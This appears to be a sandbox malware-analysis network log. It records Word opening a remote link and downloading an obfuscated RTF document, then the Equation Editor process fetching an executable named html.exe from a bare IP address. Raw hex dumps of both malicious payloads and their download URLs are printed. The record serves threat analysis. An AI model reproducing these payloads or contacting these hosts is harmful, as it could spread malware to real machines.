                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://wbze.de/">here</a>.</p><hr><address>Apache/2.4.38 (Debian) Server at wbze.de Port 80</address></body></html>
                                                    May 6, 2024 14:59:12.016588926 CEST154OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69
                                                    Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: wbze.de
                                                    May 6, 2024 14:59:12.241651058 CEST549INHTTP/1.1 301 Moved Permanently
                                                    Date: Mon, 06 May 2024 12:59:12 GMT
                                                    Server: Apache/2.4.38 (Debian)
                                                    Location: https://wbze.de/
                                                    Content-Length: 297
                                                    Keep-Alive: timeout=5, max=99
                                                    Connection: Keep-Alive
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 62 7a 65 2e 64 65 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 62 7a 65 2e 64 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://wbze.de/">here</a>.</p><hr><address>Apache/2.4.38 (Debian) Server at wbze.de Port 80</address></body></html>
                                                    May 6, 2024 14:59:13.405797005 CEST154OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69
                                                    Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: wbze.de
                                                    May 6, 2024 14:59:13.625000954 CEST549INHTTP/1.1 301 Moved Permanently
                                                    Date: Mon, 06 May 2024 12:59:13 GMT
                                                    Server: Apache/2.4.38 (Debian)
                                                    Location: https://wbze.de/
                                                    Content-Length: 297
                                                    Keep-Alive: timeout=5, max=98
                                                    Connection: Keep-Alive
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 62 7a 65 2e 64 65 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 62 7a 65 2e 64 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://wbze.de/">here</a>.</p><hr><address>Apache/2.4.38 (Debian) Server at wbze.de Port 80</address></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.2249168109.71.253.25801516C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    TimestampBytes transferredDirectionData
                                                    May 6, 2024 14:59:14.775495052 CEST342OUTGET /u7xc HTTP/1.1
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                                    UA-CPU: AMD64
                                                    Accept-Encoding: gzip, deflate
                                                    Host: wbze.de
                                                    Connection: Keep-Alive
                                                    May 6, 2024 14:59:14.993972063 CEST558INHTTP/1.1 301 Moved Permanently
                                                    Date: Mon, 06 May 2024 12:59:14 GMT
                                                    Server: Apache/2.4.38 (Debian)
                                                    Location: https://wbze.de/u7xc
                                                    Content-Length: 301
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 62 7a 65 2e 64 65 2f 75 37 78 63 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 62 7a 65 2e 64 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://wbze.de/u7xc">here</a>.</p><hr><address>Apache/2.4.38 (Debian) Server at wbze.de Port 80</address></body></html>
                                                    May 6, 2024 14:59:16.611485958 CEST131OUTHEAD /u7xc HTTP/1.1
                                                    User-Agent: Microsoft Office Existence Discovery
                                                    Host: wbze.de
                                                    Content-Length: 0
                                                    Connection: Keep-Alive
                                                    May 6, 2024 14:59:16.829956055 CEST235INHTTP/1.1 301 Moved Permanently
                                                    Date: Mon, 06 May 2024 12:59:16 GMT
                                                    Server: Apache/2.4.38 (Debian)
                                                    Location: https://wbze.de/u7xc
                                                    Keep-Alive: timeout=5, max=99
                                                    Connection: Keep-Alive
                                                    Content-Type: text/html; charset=iso-8859-1


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.2249170104.168.33.34801516C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    TimestampBytes transferredDirectionData
                                                    May 6, 2024 14:59:16.079720974 CEST486OUTGET /xampp/rzz/rz/beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood.doc HTTP/1.1
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                                    UA-CPU: AMD64
                                                    Accept-Encoding: gzip, deflate
                                                    Host: 104.168.33.34
                                                    Connection: Keep-Alive
                                                    May 6, 2024 14:59:16.246083021 CEST1289INHTTP/1.1 200 OK
                                                    Date: Mon, 06 May 2024 12:59:16 GMT
                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                    Last-Modified: Mon, 06 May 2024 08:33:05 GMT
                                                    ETag: "13818-617c4eb19287f"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 79896
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Content-Type: application/msword
                                                    Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 0d 0d 09 09 09 09 09 09 09 09 7b 5c 2a 5c 77 7a 4e 61 6d 65 35 34 31 37 39 31 33 31 35 20 5c 5b 7d 0d 7b 5c 34 33 38 39 37 33 38 36 a7 2f 30 b5 2c 3e 24 5b 38 33 21 3f 30 27 29 2d 7c 40 3f 5e 40 5e 3f 2b 28 5b 3b 38 38 37 60 60 7c 34 21 32 21 3f b5 3f 23 7c 2e 31 3f 7e 30 7e 28 5f 25 29 5b 21 25 27 3d 37 7c 3f 3f 7e 3e 25 3f 3f 36 b5 33 38 7c 5d b5 35 3d 2a 24 3f 2f 3f 3c 2c 34 2d 26 5e 3f 31 30 3c 25 3f 31 3f 3f 2b 2d 36 7c 3c b5 5e 3b 32 3d 32 3d 39 b5 40 25 2b 3b 25 5f 7c 3f 39 2d 34 36 5e 25 2f 5d b0 3c 5b 25 35 5f 5e 24 31 b5 27 40 2c 2c 29 b5 24 21 b5 33 35 36 7e a7 a7 3f 39 38 28 32 24 3f 27 3d 5f 3f 3e 28 35 5e 3f b0 5d 3c 32 32 31 33 38 2a 3f 5f 36 b0 2b 60 34 40 2f 37 7c 3d 3f 2f 28 3f 21 34 3f 2a 2e 5e 2f b0 3f 2e 2d 2c 34 b0 27 2e a7 2a 3a 5e 3c 5e 7c 39 36 5b 23 37 36 7e 2c 30 7e 60 a7 3f 25 34 29 5b 25 5f 3f 26 26 35 30 5e 23 35 a7 39 32 31 25 2f 25 7c 27 5f 30 2c 3e 36 b5 32 25 60 33 3d 27 37 37 3e 39 3c 3e 5e 38 2a 27 24 21 26 3a 38 27 3b 34 2e 30 5b 24 7e [TRUNCATED]
                                                    Data Ascii: {\rtf1{\*\wzName541791315 \[}{\43897386/0,>$[83!?0')-|@?^@^?+([;887``|4!2!??#|.1?~0~(_%)[!%'=7|??~>%??638|]5=*$?/?<,4-&^?10<%?1??+-6|<^;2=2=9@%+;%_|?9-46^%/]<[%5_^$1'@,,)$!356~?98(2$?'=_?>(5^?]<22138*?_6+`4@/7|=?/(?!4?*.^/?.-,4'.*:^<^|96[#76~,0~`?%4)[%_?&&50^#5921%/%|'_0,>62%`3='77>9<>^8*'$!&:8';4.0[$~.;4139>'.,'^5`)`1:0?)?<,^3%>$9~34[%:649=?$``^_]%])@%.4?&`|][[?;2/-@@<2&4?,,?^=017?_'.<?^?3?(|)-?9.-0(]?%`;-0531;$90)1~-#+|?+?=*.$.2`%^.>?&/>>7[87?)2:3%5,<?#4!->8-^___]_.3*-*;]+<1/,?@8?+0@%5|0:@4[][?80$&]?&?.[~4&>(]<5-'_?+4|#@2~>><<++@(<9#|/9'>%'[@*7>$[_#('~6<&.%(+7=1!.?3.9,?)=_?;<4<`[,75_*[->.>@#89)+>&%?;33|(=:??0-5*^,?0%|!4_7_6$:%??7437__;86|?+5?,,^>(~;|-6&=1~?3~9;??($|1+,?3%3?)?[2%??6?77?;#,?>-6?3849?5!9@7?7^3?76357-'=??-([-|/(6|?7;7(_?;1:?)<%'`8??./@`0?/6)%?=,6>?1<~?6(]'|1_|'<;~9[97@?,~2>|)=%37)?`8;(??,?.9(#`%/81?#^^88??]`^53?[^,||^_222^?<?^,?1||*=]?%^<>.-?]+%:.@'5+;;>/`#
                                                    May 6, 2024 14:59:16.246104002 CEST1289INData Raw: 38 3f 25 3e 5d 3a 28 2a 25 3f 7e 5d 3e b5 25 5e 3d 3d 3e 30 5f 38 2c 34 3f 3f 3f 3e 3f 36 7c 2f 3c 60 5f 25 2e 5f b5 37 27 24 2d 3e 27 27 32 5f 5e 21 3f 3f 2f 3c 21 2a 25 3f 2c 3f 3f 37 28 39 28 7c 3f 3e b0 36 b5 3f 7c 3a 2c 2c 7e 29 3f 7c 29 a7
                                                    Data Ascii: 8?%>]:(*%?~]>%^==>0_8,4???>?6|/<`_%._7'$->''2_^!??/<!*%?,??7(9(|?>6?|:,,~)?|)'<*1=~]#,;00*#:'5@$&__3?/;&1%3>_1=%?^6.[[$),|@@:-`%%=%[_8#|?+[%^,.=#33=-]11=84|.<?]=0%6)&1?%?*?.4!~/1].'527$!?):8+/[%#:+@?(@<0-;6+3|:$;$%#,!7-:]8$[?%<9@
                                                    May 6, 2024 14:59:16.246114969 CEST1289INData Raw: 2d 34 2c 28 3f 36 2b 37 5e 35 37 25 2b 31 3e a7 60 25 35 2e b5 39 25 3f 2e 32 7c 30 36 3f a7 3d 26 5e 30 2b 3d 2b 3f 2b 3f 33 2c 2b 33 28 2f 36 30 34 38 7e b5 3e 3a 2a 32 40 33 3d 24 2e 60 3e 25 31 2a 2d 21 60 32 7e 3f 38 3f 5d b5 3e 3c 25 2e 2f
                                                    Data Ascii: -4,(?6+7^57%+1>`%5.9%?.2|06?=&^0+=+?+?3,+3(/6048~>:*2@3=$.`>%1*-!`2~?8?]><%./-?9/06?>$($%8#?&#'(@4^)'&;`@812=_'`4?.6,?@:[8#1?4</?1,-%~%77'>@-287++|@2%2.|>05|~0<8!?^663]#1;:1`?-$1;7???%_&#])'5):?#'[!%:3-*1$?;$~@6@&)+`]??^=<3`66
                                                    May 6, 2024 14:59:16.246128082 CEST1289INData Raw: 38 36 30 30 36 39 30 4d 48 4f 49 55 41 54 4d 48 57 47 44 48 63 72 74 61 73 6d 67 76 79 6b 66 65 65 75 7d 7d 0a 0a 0d 0a 0a 0a 0d 0d 33 31 39 20 20 20 20 09 09 20 20 09 20 20 09 09 09 20 20 20 20 09 20 20 09 20 09 63 64 0a 0a 0d 20 5c 62 69 6e 30
                                                    Data Ascii: 8600690MHOIUATMHWGDHcrtasmgvykfeeu}}319 cd \bin000000e44020 000 00 1e00000069
                                                    May 6, 2024 14:59:16.246145010 CEST1289INData Raw: 20 09 20 09 09 30 20 20 09 20 09 09 20 09 20 20 20 09 09 20 20 20 20 09 20 20 09 20 09 09 30 30 30 0a 0d 0a 0a 0a 0d 0d 0d 30 30 33 20 09 20 09 20 20 09 09 20 09 20 20 20 09 20 20 09 09 20 20 09 20 09 09 65 09 09 09 20 20 09 09 09 09 20 09 20 09
                                                    Data Ascii: 0 000003 e 0 00 3 00feff0900 06000000
                                                    May 6, 2024 14:59:16.246157885 CEST1289INData Raw: 09 20 09 20 09 09 09 09 20 09 09 20 09 09 09 20 20 09 20 09 09 20 09 66 09 09 20 09 20 20 09 09 20 09 20 20 09 20 09 09 09 20 09 20 20 09 20 09 66 66 09 20 09 09 09 20 09 09 20 09 20 20 09 20 09 09 09 20 09 20 20 09 20 09 66 66 66 09 20 20 20 09
                                                    Data Ascii: f ff fff fffff ff ff ff fff
                                                    May 6, 2024 14:59:16.246170998 CEST1289INData Raw: 66 66 0d 0d 0a 0d 0a 0a 0a 0d 66 66 0a 0a 0d 0d 0a 0a 0a 0d 66 66 20 09 20 09 09 20 09 20 09 09 09 20 09 20 09 20 20 09 20 09 20 09 09 20 66 20 20 20 09 09 20 09 20 09 09 09 20 09 20 09 20 20 09 20 09 20 09 09 20 66 66 66 66 09 09 09 09 09 09 09
                                                    Data Ascii: ffffff f ffff fffffff f fff fffffffff
                                                    May 6, 2024 14:59:16.246187925 CEST1289INData Raw: 66 66 66 66 0d 0d 0d 0a 0a 0d 0a 0d 66 66 0a 0a 0a 0a 0a 0d 0a 0d 66 66 66 0d 0a 0d 0a 0a 0d 0a 0d 66 66 0a 0a 0d 0d 0d 0a 0d 0a 66 66 66 0d 0a 0d 0d 0d 0a 0d 0a 66 09 09 09 20 20 09 09 09 20 09 20 20 20 09 20 20 20 20 20 09 20 20 20 20 66 66 66
                                                    Data Ascii: fffffffffffffff fff fffffff fffffff ffffff
                                                    May 6, 2024 14:59:16.246201038 CEST1289INData Raw: 20 20 20 09 09 20 20 66 0d 0a 0d 0a 0d 0d 0a 0a 66 66 66 66 0d 0a 0a 0a 0d 0d 0a 0a 66 66 66 66 09 09 09 09 20 09 09 09 20 09 09 20 20 20 09 09 09 20 20 20 09 09 20 20 66 0a 0a 0d 0a 0d 0d 0a 0a 66 0a 0a 0a 0d 0d 0a 0d 0a 66 0a 0a 0d 0d 0d 0a 0d
                                                    Data Ascii: fffffffff fffff f fff fffffffffff
                                                    May 6, 2024 14:59:16.246213913 CEST1289INData Raw: 0d 0d 0d 0a 0a 0d 0a 66 0a 0a 0d 0d 0a 0a 0d 0a 66 0d 0a 0d 0d 0a 0a 0d 0a 66 66 0d 0a 0a 0a 0a 0a 0d 0a 66 66 66 66 66 20 20 20 09 20 09 20 20 20 09 20 20 09 09 09 09 09 09 09 20 09 09 20 20 66 20 20 09 20 09 20 20 20 20 09 20 20 09 09 09 09 09
                                                    Data Ascii: fffffffff f ff fff ffffff f f
                                                    May 6, 2024 14:59:16.408902884 CEST1289INData Raw: 09 20 20 09 09 09 20 20 09 20 66 66 66 0d 0a 0a 0d 0d 0a 0d 0a 66 0d 0a 0a 0d 0d 0a 0d 0a 66 0d 0a 0a 0d 0d 0a 0d 0a 66 09 09 09 20 20 20 09 20 09 09 20 09 20 20 09 20 20 09 09 20 09 20 09 20 66 20 09 09 20 09 20 09 20 09 09 20 09 20 20 09 20 20
                                                    Data Ascii: ffffff f fff ff fffff ff f
                                                    May 6, 2024 14:59:17.736639977 CEST275OUTHEAD /xampp/rzz/rz/beautifulanimakingsayingshewasreallybeautifultogofromtheentirekingdomtounderstandhowmuchsheloved___herlandandhusbandsheisgood.doc HTTP/1.1
                                                    User-Agent: Microsoft Office Existence Discovery
                                                    Host: 104.168.33.34
                                                    Content-Length: 0
                                                    Connection: Keep-Alive
                                                    May 6, 2024 14:59:17.902117014 CEST321INHTTP/1.1 200 OK
                                                    Date: Mon, 06 May 2024 12:59:17 GMT
                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                    Last-Modified: Mon, 06 May 2024 08:33:05 GMT
                                                    ETag: "13818-617c4eb19287f"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 79896
                                                    Keep-Alive: timeout=5, max=99
                                                    Connection: Keep-Alive
                                                    Content-Type: application/msword


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.2249172104.168.33.34803148C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    TimestampBytes transferredDirectionData
                                                    May 6, 2024 14:59:19.438949108 CEST313OUTGET /5457/html.exe HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: 104.168.33.34
                                                    Connection: Keep-Alive
                                                    May 6, 2024 14:59:19.598732948 CEST1289INHTTP/1.1 200 OK
                                                    Date: Mon, 06 May 2024 12:59:19 GMT
                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                    Last-Modified: Mon, 06 May 2024 08:40:11 GMT
                                                    ETag: "b7e00-617c5048189d1"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 753152
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-msdownload
                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b3 99 e2 d5 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 6a 0a 00 00 12 01 00 00 00 00 00 ae 89 0a 00 00 20 00 00 00 a0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 59 89 0a 00 4f 00 00 00 00 a0 0a 00 f0 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0b 00 0c 00 00 00 0c 68 0a 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0j @ @YOhp H.texti j `.rsrcl@@.reloc|@BHXFDX0irp}rp}(}=(+,(+,>(+,(+<(+,(*0 {O%=oo (+9O% ooO%o(~o ,n~o!~o"Q,=+&osOoQ}XiY-
                                                    May 6, 2024 14:59:19.598915100 CEST1289INData Raw: 2b 0d 00 02 72 03 00 00 70 7d 01 00 00 04 00 00 de 11 13 0e 00 02 72 3b 00 00 70 7d 01 00 00 04 00 de 00 00 2b 0d 00 02 72 7b 00 00 70 7d 01 00 00 04 00 2a 01 10 00 00 00 00 62 00 9c fe 00 11 11 00 00 01 1b 30 05 00 20 01 00 00 02 00 00 11 00 02
                                                    Data Ascii: +rp}r;p}+r{p}*b0 {O%>oo (+9O% ooO%o(~o ,n~o!~o"Q
                                                    May 6, 2024 14:59:19.598931074 CEST1289INData Raw: 06 6f 12 00 00 06 00 06 02 6f 42 00 00 0a 6f 43 00 00 0a 00 06 0b 2b 00 07 2a 00 13 30 01 00 07 00 00 00 0a 00 00 11 00 16 0a 2b 00 06 2a 00 13 30 01 00 07 00 00 00 0a 00 00 11 00 16 0a 2b 00 06 2a 00 13 30 04 00 99 00 00 00 0b 00 00 11 00 02 03
                                                    Data Ascii: ooBoC+*0+*0+*0(D,xoEs#oF&o3(4o5(6o7(8o9(:o;(<o=(>(?(+(F&(*0/
                                                    May 6, 2024 14:59:19.598947048 CEST1289INData Raw: 00 7c 41 16 19 16 73 6a 00 00 0a 6f 6b 00 00 0a 00 02 7b 0e 00 00 04 1f 0f 1f 4b 73 6c 00 00 0a 6f 6d 00 00 0a 00 02 7b 0e 00 00 04 72 b5 01 00 70 6f 6e 00 00 0a 00 02 7b 0e 00 00 04 20 a9 00 00 00 1f 19 73 6f 00 00 0a 6f 70 00 00 0a 00 02 7b 0e
                                                    Data Ascii: |Asjok{Kslom{rpon{ soop{oq{rpor{oi{rYp"|Asjok{ slom{rpon{msoop{oq{rpor
                                                    May 6, 2024 14:59:19.598961115 CEST1289INData Raw: 28 79 00 00 0a 02 7b 14 00 00 04 6f 7a 00 00 0a 00 02 28 79 00 00 0a 02 7b 13 00 00 04 6f 7a 00 00 0a 00 02 28 79 00 00 0a 02 7b 12 00 00 04 6f 7a 00 00 0a 00 02 28 79 00 00 0a 02 7b 11 00 00 04 6f 7a 00 00 0a 00 02 28 79 00 00 0a 02 7b 10 00 00
                                                    Data Ascii: (y{oz(y{oz(y{oz(y{oz(y{oz(y{oz(y{oz(y{ozrp(nrpors{(|(}(~*0rp}(O
                                                    May 6, 2024 14:59:19.598974943 CEST1289INData Raw: 01 73 4f 00 00 06 0a 02 06 6f 51 00 00 06 7d 18 00 00 04 00 11 0c 17 58 13 0c 11 0c 11 08 17 59 fe 04 13 0d 11 0d 2d c7 00 2a 00 00 13 30 01 00 0c 00 00 00 03 00 00 11 00 02 7b 18 00 00 04 0a 2b 00 06 2a 76 00 02 03 16 98 69 7d 19 00 00 04 02 03
                                                    Data Ascii: sOoQ}XY-*0{+*vi}i}}*vi}i}}*0D,{{{o+{{{o*"(*0rp}
                                                    May 6, 2024 14:59:19.598987103 CEST1289INData Raw: 1f 00 00 04 2b 73 00 28 8c 00 00 0a 73 89 00 00 0a 80 1f 00 00 04 2b 61 00 28 8d 00 00 0a 73 89 00 00 0a 80 1f 00 00 04 2b 4f 00 28 8e 00 00 0a 73 89 00 00 0a 80 1f 00 00 04 2b 3d 00 28 76 00 00 0a 73 89 00 00 0a 80 1f 00 00 04 2b 2b 00 28 8f 00
                                                    Data Ascii: +s(s+a(s+O(s+=(vs++(s+rprOp(}$+8rp(-Crp(-Hrp(-Mrp(-Rrp(-Wrp(-\+l(s +s(s
                                                    May 6, 2024 14:59:19.599000931 CEST1289INData Raw: 00 2a 1b 30 02 00 b6 00 00 00 18 00 00 11 00 14 0a 73 a2 00 00 0a 0b 07 72 0f 08 00 70 6f a3 00 00 0a 00 07 72 53 08 00 70 6f a4 00 00 0a 00 07 72 87 07 00 70 6f 9b 00 00 0a 00 07 72 5b 08 00 70 6f 9b 00 00 0a 00 07 18 6f a5 00 00 0a 00 07 17 6f
                                                    Data Ascii: *0srporSporpor[poooo,_o%,,oerpo((&{(o(or*koW)40s
                                                    May 6, 2024 14:59:19.599014997 CEST1289INData Raw: 00 04 20 88 01 00 00 20 2b 01 00 00 73 6f 00 00 0a 6f 70 00 00 0a 00 28 bb 00 00 0a 72 69 09 00 70 18 17 8d 10 00 00 01 25 16 07 a2 28 bc 00 00 0a 75 40 00 00 01 13 06 11 06 6f bd 00 00 0a 16 9a 13 07 11 07 6f be 00 00 0a 17 9a 13 08 11 08 16 8c
                                                    Data Ascii: +soop(rip%(u@ooqP%~&%~&%rspo&{*o{*o{+(ow{+rYp"Asjok{+(vo{+s lslom
                                                    May 6, 2024 14:59:19.599030018 CEST1289INData Raw: 00 04 72 c3 0a 00 70 6f cc 00 00 0a 00 02 7b 35 00 00 04 02 fe 06 3c 00 00 06 73 7b 00 00 0a 6f cd 00 00 0a 00 02 7b 31 00 00 04 72 cd 0a 00 70 6f ca 00 00 0a 00 02 7b 31 00 00 04 1f 2c 1f 14 73 6f 00 00 0a 6f cb 00 00 0a 00 02 7b 31 00 00 04 72
                                                    Data Ascii: rpo{5<s{o{1rpo{1,soo{1rpo{1:s{o{2oi{2/*slom{2rpon{2soop{2oq{2rpor{6(ow{6rY
                                                    May 6, 2024 14:59:19.751718044 CEST1289INData Raw: 00 00 0a 00 2a 00 00 13 30 05 00 c8 00 00 00 1d 00 00 11 02 72 01 00 00 70 7d 40 00 00 04 02 72 01 00 00 70 7d 41 00 00 04 02 28 1b 00 00 0a 00 00 02 03 6f 1e 00 00 0a 7d 41 00 00 04 03 0b 07 0a 06 72 ff 06 00 70 28 87 00 00 0a 2d 02 2b 0e 00 02
                                                    Data Ascii: *0rp}@rp}A(o}Arp(-+rSp}@+|rpo,`O%;o+9rp(,(&o(PXi2+(P+*0YO%


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.2249163109.71.253.254431516C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    TimestampBytes transferredDirectionData
                                                    2024-05-06 12:59:06 UTC112OUTHEAD /u7xc HTTP/1.1
                                                    Connection: Keep-Alive
